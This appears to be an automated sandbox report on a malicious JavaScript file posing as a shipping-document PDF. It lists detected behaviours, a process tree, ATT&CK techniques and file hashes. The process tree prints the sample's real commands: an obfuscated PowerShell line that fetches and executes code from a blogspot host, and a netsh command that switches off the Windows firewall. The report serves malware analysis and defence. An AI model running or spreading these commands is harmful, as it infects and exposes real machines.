Analysis
-
max time kernel
144s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
-
submitted
17-01-2024 13:40
General
-
Target
BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js
-
Size
1.4MB
-
MD5
286d534eb759c671fa9e79cfafd3bc85
-
SHA1
d165938c1c607618c5cb6d9d11cf5b371f007ac7
-
SHA256
77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
-
SHA512
3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
-
SSDEEP
192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
-
UAC bypass 3 TTPs 1 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Registers COM server for autorun 1 TTPs 2 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies registry class 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 38 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 62⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vyldccjb\vyldccjb.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5709.tmp" "c:\Users\Admin\AppData\Local\Temp\vyldccjb\CSC2BB580203AA3408988EC8A881C8446C0.TMP"4⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7884⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES5709.tmpFilesize
1KB
MD55b3419c0979d27e4beb827496a93fafd
SHA1a03dfec9e6c6db1a651436360a607e051bae3606
SHA25689855031dd5a7e7bdea49721843f8a24ec21e421b828e6c69c7511aff2f856c1
SHA51245130e779516b03552053d93eaae472199e952938a15ed5716c3a2c90ba694881f7726c572b73038c63793099a578d71065a4abdb43cdd7d65248a291a26d030
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ezbxlefq.oxw.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\vyldccjb\vyldccjb.dllFilesize
3KB
MD50d70da0e83a93ae43b5757ca1cd562c4
SHA11dc9b59d0c7cf1c3d873dd6cfbb295dc4527a262
SHA256a3615a476371dca286a38f4fc7c1aef1f345cb22406c6760d6b5c6a0f226101d
SHA5126e23d356575c74082475be07181acbed60aeb482ad3dab6908d66345431e7d8f7370b5b939b5c6fff4616df309a04a2724337109143d8c052b4e77aadfcedda0
-
\??\c:\Users\Admin\AppData\Local\Temp\vyldccjb\CSC2BB580203AA3408988EC8A881C8446C0.TMPFilesize
652B
MD5237a7c4cf8d71813e2e134034ffddee2
SHA14e0ab37ddcfb65366dc6fcb487985f56f6255d7c
SHA25668a7fb4764f4db727906780db134cc8f5789a0504c50b1dd9fafd2ec8ce997b3
SHA5125ec8ff827fa32d8a62b79d7194166aec84e8074e1667e404dfbe12e6a73f8721218591b7717c6e4bd78ec8c234acf15eb9644eebed6f5366c901a9ddd96be7e9
-
\??\c:\Users\Admin\AppData\Local\Temp\vyldccjb\vyldccjb.0.csFilesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
\??\c:\Users\Admin\AppData\Local\Temp\vyldccjb\vyldccjb.cmdlineFilesize
369B
MD5e8c4240e48639ab212ce40f59c675c7a
SHA1e5ade49fc041c500ea5f419d206af4bb0892c93a
SHA256cec74affea740b62d4fbba94be2a185c63233afdc8bc39e5ffac5dee82fa2b2f
SHA512915e421d95c93dff9243875037c5b5e3b56101eb15be36112ba3b648c3d60c068f154381cff8a0619adff6a3d6cda23bf4f4b95e75a85eb9d4f25383bda7d8de
-
memory/468-29-0x0000013FEC5F0000-0x0000013FEC5F8000-memory.dmpFilesize
32KB
-
memory/468-10-0x00007FFB92A60000-0x00007FFB93521000-memory.dmpFilesize
10.8MB
-
memory/468-14-0x0000013FEBFC0000-0x0000013FEBFD0000-memory.dmpFilesize
64KB
-
memory/468-13-0x0000013FECA30000-0x0000013FECBF2000-memory.dmpFilesize
1.8MB
-
memory/468-57-0x0000013FEBFC0000-0x0000013FEBFD0000-memory.dmpFilesize
64KB
-
memory/468-12-0x0000013FEBFC0000-0x0000013FEBFD0000-memory.dmpFilesize
64KB
-
memory/468-11-0x0000013FEBFC0000-0x0000013FEBFD0000-memory.dmpFilesize
64KB
-
memory/468-15-0x0000013FEBFC0000-0x0000013FEBFD0000-memory.dmpFilesize
64KB
-
memory/468-31-0x0000013FD22E0000-0x0000013FD22EE000-memory.dmpFilesize
56KB
-
memory/468-32-0x0000013FD2320000-0x0000013FD233A000-memory.dmpFilesize
104KB
-
memory/468-33-0x00007FFB92A60000-0x00007FFB93521000-memory.dmpFilesize
10.8MB
-
memory/468-35-0x0000013FEBFC0000-0x0000013FEBFD0000-memory.dmpFilesize
64KB
-
memory/468-72-0x00007FFB92A60000-0x00007FFB93521000-memory.dmpFilesize
10.8MB
-
memory/468-68-0x0000013FEBFC0000-0x0000013FEBFD0000-memory.dmpFilesize
64KB
-
memory/468-5-0x0000013FEC440000-0x0000013FEC462000-memory.dmpFilesize
136KB
-
memory/2212-58-0x000000006FEA0000-0x0000000070451000-memory.dmpFilesize
5.7MB
-
memory/2212-67-0x000000006FEA0000-0x0000000070451000-memory.dmpFilesize
5.7MB
-
memory/3576-45-0x0000000000400000-0x000000000048C000-memory.dmpFilesize
560KB
-
memory/3576-47-0x0000000001930000-0x0000000001940000-memory.dmpFilesize
64KB
-
memory/3576-46-0x0000000070590000-0x0000000070B41000-memory.dmpFilesize
5.7MB
-
memory/3576-48-0x0000000070590000-0x0000000070B41000-memory.dmpFilesize
5.7MB
-
memory/3576-55-0x0000000070590000-0x0000000070B41000-memory.dmpFilesize
5.7MB
-
memory/3728-110-0x0000012DF0BB0000-0x0000012DF0BB1000-memory.dmpFilesize
4KB
-
memory/3728-109-0x0000012DF0AA0000-0x0000012DF0AA1000-memory.dmpFilesize
4KB
-
memory/3728-108-0x0000012DF0AA0000-0x0000012DF0AA1000-memory.dmpFilesize
4KB
-
memory/3728-106-0x0000012DF0A70000-0x0000012DF0A71000-memory.dmpFilesize
4KB
-
memory/3728-90-0x0000012DE8740000-0x0000012DE8750000-memory.dmpFilesize
64KB
-
memory/5112-39-0x0000000004EA0000-0x0000000004F06000-memory.dmpFilesize
408KB
-
memory/5112-38-0x00000000053E0000-0x0000000005984000-memory.dmpFilesize
5.6MB
-
memory/5112-36-0x0000000000800000-0x000000000088C000-memory.dmpFilesize
560KB
-
memory/5112-69-0x00000000068B0000-0x00000000068BA000-memory.dmpFilesize
40KB
-
memory/5112-37-0x0000000074930000-0x00000000750E0000-memory.dmpFilesize
7.7MB
-
memory/5112-73-0x0000000074930000-0x00000000750E0000-memory.dmpFilesize
7.7MB
-
memory/5112-42-0x00000000050D0000-0x0000000005162000-memory.dmpFilesize
584KB
-
memory/5112-44-0x0000000005990000-0x0000000005B52000-memory.dmpFilesize
1.8MB
-
memory/5112-43-0x0000000004F10000-0x0000000004F60000-memory.dmpFilesize
320KB
-
memory/5112-40-0x00000000050C0000-0x00000000050D0000-memory.dmpFilesize
64KB
-
memory/5112-41-0x0000000004FB0000-0x000000000504C000-memory.dmpFilesize
624KB